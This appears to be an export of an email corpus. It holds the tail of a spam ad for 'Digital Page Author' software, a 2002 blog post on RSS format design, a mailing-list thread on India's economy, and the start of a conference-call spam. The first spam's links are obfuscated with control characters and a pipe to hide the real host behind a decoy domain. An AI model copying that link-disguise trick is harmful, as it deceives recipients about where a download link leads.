       size=1&gt;&lt;A href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101"&gt;&lt;B&gt;&lt;BR&gt;VIEW SAMPLES&lt;/B&gt;&lt;/A&gt;&lt;/FONT&gt; &lt;BR&gt;&lt;BR&gt;&lt;BR&gt;
 &lt;A href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101"&gt;&lt;FONT 
       face="Verdana, Arial, Helvetica, sans-serif" size=1&gt;&lt;B&gt;DOWNLOAD FREE SOFTWARE&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt; &lt;BR&gt;&lt;BR&gt;&lt;FONT 
       face="Verdana, Arial, Helvetica, sans-serif" size=-2&gt;&lt;B&gt;&lt;FONT 
       color=#ec0000&gt;&lt;A href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101"&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD colSpan=2&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" 
       color=#000000 size=-1&gt;Digital Page Author enables companies and 
       individuals to produce their own professional looking catalogues, 
       brochures, photo albums, invitations and more--in-house--without the associated costs 
       of an outside design and/or print shop.&lt;BR&gt;&lt;BR&gt;Due to their &lt;b&gt;extremly 
       small file size&lt;/b&gt;, Digital Web Books created with Digital Page Author can be 
       sent via email or quickly downloaded onto a PC. In minutes, a business can 
       create its own virtual catalogue in a format any Windows PC can display, 
       while ensuring the content cannot be copied by the 
   viewer. The optional Security Plugin provides &lt;b&gt; Virus Proof&lt;/b&gt; distribution including transport through firewalls.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&amp;nbsp;
 &lt;BR&gt;
 &lt;TABLE borderColor=#abcadc cellSpacing=0 cellPadding=3 width=534 border=1&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD vAlign=top bgColor=#ffffff height=990&gt;
       &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=1&gt;The Digital 
       Web Book format presents several opportunities, none more important than 
       the incredible p&lt;FONT size=-2&gt;ass-on ratio of each 
       brochure/publication.&lt;/FONT&gt;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=-2&gt;Digital Web 
       Books are extremely small in file size, present a familiar navigation 
       system and can be used to attract new members. &lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=-2&gt;&lt;B&gt;Why are 
       people attracted to Digital Web Books?&lt;/B&gt;  It's the look and feel of a 
       traditional brochure that captures the imagination of the end user. There 
       are several page transition choices, but the 3D page-turns really stand out.&lt;/FONT&gt;&lt;/P&gt;
       &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" color=#000066 
       size=-1&gt;&lt;B&gt;Possible Uses&lt;/B&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;FONT 
       face="Verdana, Arial, Helvetica, sans-serif" size=-2&gt;Catalogues - Flyers - 
       Brochures - Annual Reports - Photo Albums - Newsletters - Media Kits - 
       Work Portfolios - Corporate Presentations - Manuals - Books - Magazines - 
       Novels Newspapers - Sales Presentations - Marketing Collateral - Intranet 
       Publications - Restaurant Menus - Educational Materials - Reference 
       Materials - Email promotions - Corporate / Product Profiles - Guides - 
       Reports - Briefs - Directories - and much, much more!&lt;/FONT&gt;&lt;/P&gt;
       &lt;TABLE cellSpacing=0 cellPadding=6 width=522 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR bgColor=#000066&gt;
           &lt;TD colSpan=2&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" 
             color=#000066 size=-1&gt;&lt;B&gt;&lt;FONT color=#ffffff&gt;Digital Page Author 
             Features&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=4&gt;&lt;FONT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size=-2&gt;Produce 3D page-turning digital catalogues, manuals, 
             photo albums, etc.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;FONT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size=-2&gt;A 
             universally understood format.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;FONT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size=-2&gt;WSIWYG page creation and editing. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;FONT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size=-2&gt;Cut 
             and paste feature, internal image manipulator, hotlink to pages, web 
             sites, email and even other files. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;FONT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size=-2&gt;Set 
             auto page turn for trade show or in-store 
 presentations.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;FONT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size=-2&gt;Digital Web Book file sizes are small and easily distributed by 
             email, download or on floppy/CD. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;FONT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size=-2&gt;No 
             browser required--no downloading of software or plug-ins. 
         &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;FONT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size=-2&gt;Pages 
             fit your desktop screen--no scrolling required. Specify one of 6 
             page transitions: fly, turn, wipe, slide. Printable pages. 
           &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD&gt;&lt;FONT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size=-2&gt;Suitable for all Windows-based PCs, but currently non-Mac 
             compatible.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;TABLE cellSpacing=0 cellPadding=6 width=522 border=0&gt;
         &lt;TBODY&gt;
         &lt;TR bgColor=#000066&gt;
           &lt;TD colSpan=2&gt;&lt;B&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" 
             color=#ffffff size=-1&gt;Benefits&lt;/FONT&gt;&lt;/B&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=4&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" 
             size=-2&gt;&lt;IMG height=8 src="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101/images/bullet.gif" 
             width=8&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;
             &lt;P&gt;
             &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=-2&gt;Fast 
             to learn and easy to use, the Net Book Author interface is designed 
             with the average PC user in mind. &lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=4&gt;&lt;FONT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size=-2&gt;Saves 
             printing and distribution costs associated with print media. 
           &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=4&gt;&lt;FONT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size=-2&gt;No 
             scrolling to view each page within PC screen--turns pages like a 
             real Book.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=4&gt;&lt;FONT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size=-2&gt;Easy 
             to distribute: via the Web, email, floppy or CD-ROM. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=4&gt;&lt;FONT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size=-2&gt;Easily passed on by email. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=4&gt;&lt;FONT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size=-2&gt;Recipients of the Book can store, view and interact with its 
             content off-line. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=4&gt;&lt;FONT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size=-2&gt;Drives traffic to your web site. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD width=4&gt;&lt;FONT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size=-2&gt;Encourages customer loyalty/repeat purchases. &lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
         &lt;TR&gt;
           &lt;TD width=4&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" 
             size=-2&gt;&lt;IMG height=8 src="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101/images/bullet.gif" 
             width=8&gt;&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" 
             size=-2&gt;Permanent information is 
       read-only.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
       &lt;P&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" color=#000066 
       size=-1&gt;&lt;B&gt;System and Software Requirements&lt;/B&gt;&lt;/FONT&gt; &lt;FONT 
       face="Verdana, Arial, Helvetica, sans-serif" size=-2&gt;&lt;BR&gt;Windows 95, 98, 
       ME, NT 4.0, 2000, XP&lt;BR&gt;Currently Not Mac Compatable&lt;BR&gt;&lt;br&gt;&lt;b&gt;Hardware 
       Requirements&lt;/b&gt; (minimum recommended)&lt;BR&gt;300 MHz processor or faster&lt;BR&gt;64 MB 
       RAM&lt;BR&gt;8 MB Video Graphics Adapter&lt;BR&gt;20 MB free disk 
       space&lt;BR&gt;&lt;BR&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT 
       face="Verdana, Arial, Helvetica, sans-serif" size=-2&gt;&lt;FONT color=#000066 
       size=-1&gt;Other Requirements&lt;/FONT&gt;&lt;/FONT&gt; &lt;BR&gt;&lt;/B&gt;&lt;FONT 
       face="Verdana, Arial, Helvetica, sans-serif" size=-2&gt;Internet connection 
       for product registration&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" 
       color=#ff0000 size=2&gt;&lt;B&gt;&lt;A 
       href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101/unsubscribe.asp"&gt;Click here to 
       unsubscribe&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD align=middle bgColor=#ffffff height=37&gt;
       &lt;DIV align=center&gt;&lt;A href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101"&gt;&lt;FONT 
       face="Verdana, Arial, Helvetica, sans-serif" color=#336699 
       size=-2&gt;&lt;B&gt;Download FREE Evaluation&lt;/B&gt;&lt;/FONT&gt;&lt;/A&gt;&lt;FONT 
       face="Verdana, Arial, Helvetica, sans-serif" color=#336699 size=-2&gt;&lt;B&gt; | 
       &lt;A href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101"&gt;Download Sample&lt;/A&gt; |&lt;A 
       href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101/"&gt; BUY NOW!&lt;/A&gt;&lt;/B&gt;&lt;/FONT&gt;
 &lt;BR&gt;
 &lt;BR&gt;
 &lt;FONT face="Verdana, Arial, Helvetica, sans-serif" size=-2&gt;If you have trouble downloading the FREE Software, please open this mail again soon to retry, as server demands are currently high for this limited time FREE Software offer.&lt;/FONT&gt;
 &lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
   &lt;TR&gt;
     &lt;TD class=text align=middle bgColor=#ffffff height=22&gt;
       &lt;DIV align=center&gt;&lt;FONT face="Verdana, Arial, Helvetica, sans-serif" 
       size=1&gt;Copyright  2002 - Reselling Partner ID# 1067 - *4 page limit&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;MAP name=Map&gt;&lt;AREA shape=RECT 
   coords=39,69,112,104 href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101/"&gt;&lt;AREA shape=RECT 
   coords=32,4,191,30 href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101/"&gt;&lt;AREA shape=RECT 
   coords=33,31,190,62 href="http://www.05-cray.category.unique.zaam.net_x0001__x0014__x0014__x0014_.co.fr&amp;#20;&amp;#2;&amp;#20;&amp;#5;&amp;#20;|https.am2002.goopt.com:8101/"&gt;&lt;/MAP&gt;&lt;/DIV&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 3156bryQ4-819ISNs3103DAzp9-826XDxo9238Ndkx4-186ZPPL998l51
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: In praise of evolvable formats
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://diveintomark.org/archives/2002/10/08.html#in_praise_of_evolvable_formats
 Date: 2002-10-08T12:28:10-05:00
 _Clay Shirky_: In Praise of Evolvable Systems[1]. This entire article could be 
 rewritten to explain RSS. In fact, let's do that. 
 If it were April Fool's Day, the Net's only official holiday, and you wanted to 
 design a &amp;#8220;novelty format&amp;#8221; to slip by the W3C as a joke, it might 
 look something like RSS 0.9x/2.0: 
 - It would specify limits on data values, then remove them, then specify 
 required elements, then make them optional, thus silently breaking an unknown 
 number of parsers around the world. 
 - It would encourage use of entity-encoded HTML in its most important element, 
 thus ensuring both security risks and unpredictable display for the end user. 
 - It would ignore years of standards work in other fields, committing such 
 egregious sins as defining a guid element that wasn't a GUID, and using an 
 obsolete date format that couldn't easily be sorted by date. 
 - Its primary method of extensibility would be to add new elements to the core 
 namespace without telling anyone or documenting them, thus making it wholely 
 resistant to DTD, schema, or validation of any kind. 
 - After years of worldwide deployment, it would completely reverse its 
 add-whatever-you-want extensibility rules in favor of namespaces, which the 
 spec would neither define nor elaborate on. 
 - After adopting namespaces, it would fail to deprecate any existing elements 
 semantically identical to namespace elements already in wide use. It would also 
 fail to provide precedence rules in cases where a document attempted to say the 
 same thing in two different ways, thus ensuring mass confusion among producers 
 and inconsistent behavior across consumers. 
 RSS 0.9x and 2.0 are the Whoopee Cushion and Joy Buzzer of syndication formats. 
 For anyone who has tried to accomplish anything serious with metadata, it's 
 pretty obvious that of the various implementations of a worldwide syndication 
 format, we have the worst one possible. 
 Except, of course, for all the others. 
 The problem with that list of RSS deficiencies is that it is also a list of 
 necessities&amp;#8212;RSS has flourished in a way that no other syndication format 
 has, not despite many of these qualities but because of them. The very 
 weaknesses that make RSS so infuriating to serious practitioners also make it 
 possible in the first place. 
 - Removing length limitations on description and making title optional opened 
 up RSS to a whole new category of producer: the weblogger. 
 - Allowing encoded HTML in description let publishers reuse both their existing 
 content and the existing RSS infrastructure, without requiring them to produce 
 valid XHTML (which could be embedded directly into an XML document). Social 
 mores, rather than technical rules, prevent producers from intentionally 
 introducing security risks through malicious script tags or unpredictable 
 display through unclosed HTML elements. 
 - Few publishing tools can produce real conforming GUIDs, and it doesn't 
 matter, because virtually all RSS parsers are written in high level languages 
 where handling strings is more efficient than converting strings to bytecodes 
 and handling bytecodes. As for dates, by convention an RSS document is laid out 
 in reverse chronological order, and no one seems to be clamoring for more 
 flexibility. 
 Furthermore, its almost babyish XML syntax, so far from any serious 
 computational framework (Where are the namespaces? Where is the Document Type 
 Description? Why is the aggregators' enforcement of conformity so lax?), made 
 it possible for anyone wanting an RSS feed to write one. The effects of this 
 ease of implementation only become clear when you compare it to the attempts 
 over the years to &amp;#8220;do RSS right&amp;#8221;&amp;#8212;most notably RSS 1.0 in the 
 year 2000. RSS 1.0 had three main benefits: 
 - Backward compatible with RSS 0.90, which was never widely deployed, and which 
 fell into obscurity as soon as (the much simpler) RSS 0.91 was introduced. 
 - Based on RDF (specifically a serialization called RDF/XML), a spec which, at 
 the time and to this day, continues to change or threaten to change. Two years 
 later, there are no major languages or development platforms that ship with 
 parsers to consume RDF, although many (Perl, Python, .NET) have third-party RDF 
 parsers in various states of development and conformance. (The release version 
 is generally out of date; CVS access is recommended. You get the idea.) 
 Meanwhile, RDF/XML production tools are so inconsistent that even RDF experts 
 recommend not using RDF tools to produce an RSS 1.0 feed if you want it to 
 actually be read by any major RSS aggregator. Despite the two-year-old promise 
 of better tools[2], it is now the year 2002, and I built my RSS 1.0 
 feed&amp;#8212;in the most sophisticated personal publishing system in the 
 world&amp;#8212;by manually typing a mishmash of template tags and angle brackets 
 into a TEXTAREA of an HTML form. 
 - Extensible through namespaces, which, as mentioned above, have been 
 haphazardly and poorly incorporated into RSS 2.0, where they appear to be 
 flourishing. 
 Evolvable formats&amp;#8212;those that proceed by being adapted and extended in a 
 thousand small ways&amp;#8212;have three main characteristics that are germane to 
 their eventual victories over strong, centrally designed formats. 
 - Only solutions that produce partial results with imperfect tools can succeed. 
 My RSS feed is an XML document produced by a template that I built in a 
 TEXTAREA, and consumed by hundreds of parsers around the world that know 
 nothing of XML and hack apart my feed with regular expressions. The world is 
 littered with formats that would have worked if only everyone had better tools. 
 If everyone in the world had a perfect RDF parser at their disposal, it would 
 be trivial to produce and consume all the world's metadata in RDF. Without such 
 perfect tools, both production and consumption instantly become nightmares. 
 There is no middle ground. 
 - What is, is wrong. Because evolvable formats have always been adapted to 
 earlier conditions and are always being further adapted to present conditions, 
 they are always behind the times. RSS was being stretched with long 
 descriptions, optional titles, and entity-encoded HTML even before such 
 practices were codified in the spec, and long before all consumers could handle 
 them. No evolving format is ever perfectly in sync with the challenges it 
 faces. 
 - Finally, Orgel's Rule, named for the evolutionary biologist Leslie 
 Orgel&amp;#8212;&amp;#8220;Evolution is cleverer than you are&amp;#8221;. As with the list 
 of RSS's obvious deficiencies above, it is easy to point out what is wrong with 
 any evolvable system at any point in its life. No one seeing RSS 1.0 and RSS 
 0.91 side-by-side could doubt that RSS 1.0 had the superior technology, that it 
 &amp;#8220;did things right&amp;#8221;. However, the ability to understand what is 
 missing at any given moment does not mean that one person or a small central 
 group can design a better system in the long haul. 
 Designed formats start out strong and improve logarithmically. Evolvable 
 formats start out weak and improve exponentially. RSS 2.0 is not the perfect 
 syndication format, just the best one that's also currently practical. 
 Infrastructure built on evolvable formats will always be partially incomplete, 
 partially wrong and ultimately better designed than its competition.
 [1] http://www.shirky.com/writings/evolve.html
 [2] http://groups.yahoo.com/group/syndication/message/467
</t>
  </si>
  <si>
    <t xml:space="preserve">
 The question is why are they still poor?
 Especially given the success of Indian immigrants in other societies?
 South Korea was a lot poorer after the Korean war than Ghana when it
 gained its independence at about the same time.  That was after India
 gained independence, and Korea couldn't have been in better shape at
 that point than India (my impression).
 &gt; -----Original Message-----
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 &gt; sateesh narahari
 &gt; Sent: Tuesday, August 20, 2002 12:44 PM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: Re: The Curse of India's Socialism
 &gt; 
 &gt; All good arguments, except till you realize that
 &gt; majority of indians were poor even before
 &gt; independence.
 &gt; 
 &gt; Sateesh
 &gt; 
 &gt; 
 &gt; --- "R. A. Hettinga" &lt;rah@shipwright.com&gt; wrote:
 &gt; &gt;
 &gt; http://online.wsj.com/article_print/0,,SB1029790639190441115,00.html
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; The Wall Street Journal
 &gt; &gt;
 &gt; &gt; August 20, 2002
 &gt; &gt; COMMENTARY
 &gt; &gt;
 &gt; &gt; The Curse of India's Socialism
 &gt; &gt;
 &gt; &gt; By CHRISTOPHER LINGLE
 &gt; &gt;
 &gt; &gt; In a classic case of deflecting blame for their own
 &gt; &gt; shortcomings,
 &gt; &gt; politicians in India have identified the size of the
 &gt; &gt; population as the
 &gt; &gt; country's biggest problem. This position was stated
 &gt; &gt; in a unanimous
 &gt; &gt; parliamentary resolution passed on the 50th
 &gt; &gt; anniversary of independence.
 &gt; &gt; Half a decade later, it is a belief that still
 &gt; &gt; resonates with many. Yet it
 &gt; &gt; is hard to imagine a more cynical view. If left free
 &gt; &gt; from the extensive
 &gt; &gt; interference of various levels of government, the
 &gt; &gt; energy and creativity of
 &gt; &gt; the Indian people could soon allow them to be among
 &gt; &gt; the richest on earth.
 &gt; &gt;
 &gt; &gt; Indians are not poor because there are too many of
 &gt; &gt; them; they are poor
 &gt; &gt; because there are too many regulations and too much
 &gt; &gt; government intervention
 &gt; &gt; -- even today, a decade after reforms were begun.
 &gt; &gt; India's greatest problems
 &gt; &gt; arise from a political culture guided by socialist
 &gt; &gt; instincts on the one
 &gt; &gt; hand and an imbedded legal obligation on the other
 &gt; &gt; hand.
 &gt; &gt;
 &gt; &gt; While India's political culture reflects the beliefs
 &gt; &gt; of its founding
 &gt; &gt; fathers, there is the additional matter of the
 &gt; &gt; modified preamble to its
 &gt; &gt; constitution that specifies: "India is a sovereign,
 &gt; &gt; secular, socialist
 &gt; &gt; republic." It was Indira Gandhi who had the words
 &gt; &gt; "socialist" and "secular"
 &gt; &gt; added in the late 1970s. At the same time, she also
 &gt; &gt; amended the relevant
 &gt; &gt; section in the Representation of Peoples Act to
 &gt; &gt; require that all recognized
 &gt; &gt; and registered parties swear by this preamble. Since
 &gt; &gt; all parties must stand
 &gt; &gt; for socialism, no party espouses classical
 &gt; &gt; liberalism (yet there are
 &gt; &gt; numerous communist parties).
 &gt; &gt;
 &gt; &gt; While one can appreciate the difficulty of
 &gt; &gt; abandoning ideas with such
 &gt; &gt; honored lineage, the fact that socialism has been
 &gt; &gt; widely discredited and
 &gt; &gt; abandoned in most places should prompt Indians to
 &gt; &gt; reconsider this
 &gt; &gt; commitment. Despite evidence of its failure as an
 &gt; &gt; economic system, many of
 &gt; &gt; the socialists who carry on do so by trying to
 &gt; &gt; proclaim that their dogma
 &gt; &gt; reinforces certain civic virtues. A presumed merit
 &gt; &gt; of socialism is that it
 &gt; &gt; aims to nurture a greater sense of collective
 &gt; &gt; identity by suppressing the
 &gt; &gt; narrow self-interest of individuals. However, this
 &gt; &gt; aspect of socialism lies
 &gt; &gt; at the heart of its failure both as a political tool
 &gt; &gt; as well as the basis
 &gt; &gt; for economic policy.
 &gt; &gt;
 &gt; &gt; Let's start with the economic failures of socialism.
 &gt; &gt; Most of the grand
 &gt; &gt; experiments have been ignominiously abandoned or
 &gt; &gt; recast in tortured terms
 &gt; &gt; such as the "Third Way" that defer to the importance
 &gt; &gt; of markets and
 &gt; &gt; individual incentives. Unfortunately, it took a
 &gt; &gt; great deal of human
 &gt; &gt; suffering before socialists abandoned their goal of
 &gt; &gt; trying to create an
 &gt; &gt; economic system on the basis of collective goals.
 &gt; &gt;
 &gt; &gt; Socialist ideologues are impervious to evidence that
 &gt; &gt; their system inspires
 &gt; &gt; even more human misery in the civic realm. This is
 &gt; &gt; because socialism
 &gt; &gt; provides the political mechanism for and legitimacy
 &gt; &gt; by which people
 &gt; &gt; identify as members of groups. While it may suit the
 &gt; &gt; socialist agenda to
 &gt; &gt; create them-and-us scenarios relating to workers and
 &gt; &gt; capitalists or
 &gt; &gt; peasants and urban dwellers, this logic is readily
 &gt; &gt; converted to other types
 &gt; &gt; of divisions.
 &gt; &gt;
 &gt; &gt; In the case of India, competition for power has
 &gt; &gt; increasingly become
 &gt; &gt; identified with religiosity or ethnicity, as is
 &gt; &gt; evident by the rise of the
 &gt; &gt; Bharatiya Janata Party, supported by radical
 &gt; &gt; Hindutva supporters. As
 &gt; &gt; elsewhere, political parties based on religion are
 &gt; &gt; by their very nature
 &gt; &gt; exclusionary. These narrow concepts of identity work
 &gt; &gt; against nation
 &gt; &gt; building since such a politics forces arrangements
 &gt; &gt; that cannot accommodate
 &gt; &gt; notions of universal values.
 &gt; &gt;
 &gt; &gt; Socialism also sets the stage for populist promises
 &gt; &gt; of taking from one
 &gt; &gt; group to support another. This variety of political
 &gt; &gt; posturing by the
 &gt; &gt; Congress Party was used to build a coalition of
 &gt; &gt; disaffected minorities. In
 &gt; &gt; turn, the BJP built its power base on a promise to
 &gt; &gt; restore power to Hindus.
 &gt; &gt; And so it is that India's heritage of socialist
 &gt; &gt; ideology provided the
 &gt; &gt; beginnings of a political culture that evolved into
 &gt; &gt; sectarian populism that
 &gt; &gt; has wrought cycles of communal violence. Populism
 &gt; &gt; with its solicitations of
 &gt; &gt; political patronage, whether based upon nationalism
 &gt; &gt; or some other ploy, is
 &gt; &gt; also open to the sort of rampant corruption so
 &gt; &gt; evident in India.
 &gt; &gt;
 &gt; &gt; At issue in India is nothing less than the role of
 &gt; &gt; the state. Should it be
 &gt; &gt; used as a mechanism to protect the freedom and
 &gt; &gt; rights of individuals? Or
 &gt; &gt; should the state be a vehicle for groups to gain
 &gt; &gt; power? It should be clear
 &gt; &gt; the latter approach would lead to the destruction of
 &gt; &gt; India's democracy
 &gt; &gt; while the former will allow it to survive.
 &gt; &gt;
 &gt; &gt; It is undeniable that India's public policy guided
 &gt; &gt; by socialism has
 &gt; &gt; promoted divisions that contributed to social
 &gt; &gt; instability and economic
 &gt; &gt; destruction. This dangerous game has only served the
 &gt; &gt; narrow interests of
 &gt; &gt; those who seek to capture or preserve power. That
 &gt; &gt; India is a "socialist"
 &gt; &gt; state, specified in a preamble to the constitution,
 &gt; &gt; makes this binding
 &gt; &gt; commitment evident in the nature of interventionist
 &gt; &gt; policies that have
 &gt; &gt; wrought slower economic growth causing great harm to
 &gt; &gt; the poor and unskilled
 &gt; &gt; who have lost access to economic opportunities.
 &gt; &gt; Socialism also introduced
 &gt; &gt; forces that are destroying India's hard-earned
 &gt; &gt; democracy. A paradigm shift
 &gt; &gt; in the nature of Indian politics is needed so the
 &gt; &gt; state ceases serving as a
 &gt; &gt; mechanism for groups to gain power and instead
 &gt; &gt; becomes an instrument to
 &gt; &gt; secure rights and freedoms for individuals.
 &gt; &gt;
 &gt; &gt; Mr. Lingle is professor of economics at Universidad
 &gt; &gt; Francisco Marroquin in
 &gt; &gt; Guatemala, and global strategist for
 &gt; &gt; eConoLytics.com.
 &gt; &gt;
 &gt; &gt;
 &gt; &gt;
 &gt; &gt; --
 &gt; &gt; -----------------
 &gt; &gt; R. A. Hettinga &lt;mailto: rah@ibuc.com&gt;
 &gt; &gt; The Internet Bearer Underwriting Corporation
 &gt; &gt; &lt;http://www.ibuc.com/&gt;
 &gt; &gt; 44 Farquhar Street, Boston, MA 02131 USA
 &gt; &gt; "... however it may deserve respect for its
 &gt; &gt; usefulness and antiquity,
 &gt; &gt; [predicting the end of the world] has not been found
 &gt; &gt; agreeable to
 &gt; &gt; experience." -- Edward Gibbon, 'Decline and Fall of
 &gt; &gt; the Roman Empire'
 &gt; &gt; http://xent.com/mailman/listinfo/fork
 &gt; 
 &gt; 
 &gt; __________________________________________________
 &gt; Do You Yahoo!?
 &gt; HotJobs - Search Thousands of New Jobs
 &gt; http://www.hotjobs.com
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: $ave money on your long distance conference calls
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;Take Control Of Your Conference Calls&lt;/TITLE&gt;
 &lt;META http-equiv=3DContent-Type content=3D"text/html; charset=3Dwindows-12=
 52"&gt;
 &lt;META content=3D"MSHTML 5.50.4134.600" name=3DGENERATOR&gt;&lt;/HEAD&gt;
 &lt;BODY vLink=3D#c0c0c0 link=3D#c0c0c0 bgColor=3D#FFFFFF leftMargin=3D0&gt;&lt;FON=
 T 
 face=3DTimes, New Roman&gt;
 &lt;P&gt;
 &lt;CENTER&gt;
 &lt;TABLE width=3D600 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD align=3Dmiddle&gt;&lt;B&gt;&lt;FONT color=3D#000066 size=3D6&gt;Crystal Clear  
       Conference Calls&lt;BR&gt;Only &lt;U&gt;18 Cents&lt;/U&gt; Per Minute!&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;=
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;P&gt;&lt;FONT color=3D#666600 size=3D5&gt;&lt;B&gt;(Anytime/Anywhere)&lt;/B&gt;&lt;/FONT&gt; 
 &lt;P&gt;
 &lt;TABLE width=3D350 border=3D0&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD&gt;&lt;FONT color=3D#000066 size=3D3&gt;&lt;B&gt;
       &lt;LI&gt;No setup fees 
       &lt;LI&gt;No contracts or monthly fees 
